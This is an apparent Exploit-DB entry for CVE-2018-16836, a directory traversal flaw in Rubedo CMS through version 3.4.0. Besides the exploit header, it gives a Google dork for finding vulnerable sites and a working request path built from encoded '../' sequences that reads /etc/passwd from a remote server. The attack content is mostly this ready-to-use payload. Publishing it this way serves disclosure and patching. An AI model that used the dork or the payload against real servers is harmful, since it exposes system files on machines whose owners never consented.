Rubedo CMS 3.4.0 - Directory Traversal

EDB-ID:

45385




Platform:

Linux

Date:

2018-09-12


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836

# PoC:
# Read /etc/passwd file from remote server

/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'